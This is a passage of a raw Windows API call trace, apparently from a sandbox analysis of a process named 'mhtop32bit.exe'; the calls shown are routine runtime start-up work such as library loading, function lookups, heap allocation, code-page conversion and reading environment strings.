hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0078.161] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0078.161] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.161] GetLastError () returned 0x57 [0078.161] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0078.161] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0078.161] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.161] GetLastError () returned 0x57 [0078.161] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x75670000 [0078.163] GetProcAddress (hModule=0x75670000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0078.163] GetProcessHeap () returned 0x6d0000 [0078.163] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.163] GetLastError () returned 0x57 [0078.163] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0078.164] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.164] GetLastError () returned 0x57 [0078.164] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0078.164] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0078.164] GetLastError () returned 0x57 [0078.164] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0078.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x364) returned 0x6e4af0 [0078.164] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0078.164] SetLastError (dwErrCode=0x57) [0078.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xc00) returned 0x6e4e60 [0078.166] GetStartupInfoW (in: lpStartupInfo=0x2cfe70 | out: lpStartupInfo=0x2cfe70*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xc83dc0, hStdOutput=0x81557fb0, hStdError=0xfffffffe)) [0078.166] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.166] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0078.166] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.166] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe\"" [0078.166] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe\"" [0078.166] GetLastError () returned 0x57 [0078.167] SetLastError (dwErrCode=0x57) [0078.167] GetLastError () returned 0x57 [0078.167] SetLastError (dwErrCode=0x57) [0078.167] GetACP () returned 0x4e4 [0078.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x220) returned 0x6e47a8 [0078.167] IsValidCodePage (CodePage=0x4e4) returned 1 [0078.167] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cfea0 | out: lpCPInfo=0x2cfea0) returned 1 [0078.167] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cf768 | out: lpCPInfo=0x2cf768) returned 1 [0078.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cfd7c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cfd7c, cbMultiByte=256, lpWideCharStr=0x2cf508, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蝛ÉĀ") returned 256 [0078.167] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蝛ÉĀ", cchSrc=256, lpCharType=0x2cf77c | out: lpCharType=0x2cf77c) returned 1 [0078.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cfd7c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cfd7c, cbMultiByte=256, lpWideCharStr=0x2cf4b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矤ÉĀ") returned 256 [0078.167] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.167] GetLastError () returned 0x57 [0078.167] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0078.168] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0078.168] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矤ÉĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.168] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矤ÉĀ", cchSrc=256, lpDestStr=0x2cf2a8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0078.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x2cfc7c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ Úµ\x81¸þ,", lpUsedDefaultChar=0x0) returned 256 [0078.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cfd7c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cfd7c, cbMultiByte=256, lpWideCharStr=0x2cf4d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0078.168] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.168] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2cf2c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0078.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x2cfb7c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ Úµ\x81¸þ,", lpUsedDefaultChar=0x0) returned 256 [0078.168] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e49d0 [0078.168] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xccda20, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mhtop32bit.exe")) returned 0x3c [0078.168] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x45) returned 0x6e6268 [0078.168] RtlInitializeSListHead (in: ListHead=0xccd398 | out: ListHead=0xccd398) [0078.169] GetLastError () returned 0x0 [0078.169] SetLastError (dwErrCode=0x0) [0078.169] GetEnvironmentStringsW () returned 0x6e62b8* [0078.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x565) returned 0x6e6d90 [0078.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x6e6d90, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0078.169] FreeEnvironmentStringsW (penv=0x6e62b8) returned 1 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x98) returned 0x6e62b8 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1f) returned 0x6e60e8 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x36) returned 0x6e6358 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x37) returned 0x6e6398 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3c) returned 0x6e63d8 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x31) returned 0x6e6420 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x17) returned 0x6e4a58 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6e0c58 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x14) returned 0x6e6460 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xd) returned 0x6deff0 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x25) returned 0x6e6480 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x39) returned 0x6e64b0 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6e64f8 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x17) returned 0x6e6518 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xe) returned 0x6df008 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x69) returned 0x6e6538 [0078.169] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3e) returned 0x6e7318 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1b) returned 0x6e6110 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1d) returned 0x6e6138 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x48) returned 0x6e65b0 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x12) returned 0x6e6600 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6e6620 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1b) returned 0x6e6160 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6e6640 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x29) returned 0x6e6670 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1e) returned 0x6e6188 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x41) returned 0x6e66a8 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x17) returned 0x6e66f8 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xf) returned 0x6df020 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x16) returned 0x6e6718 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2a) returned 0x6e6738 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x29) returned 0x6e6770 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x15) returned 0x6e67a8 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1e) returned 0x6e61b0 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2a) returned 0x6e67c8 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x12) returned 0x6e6800 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6e6820 [0078.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x46) returned 0x6e6840 [0078.170] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6d90 | out: hHeap=0x6d0000) returned 1 [0078.170] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0078.170] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="InitOnceExecuteOnce") returned 0x76d5d627 [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0078.171] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 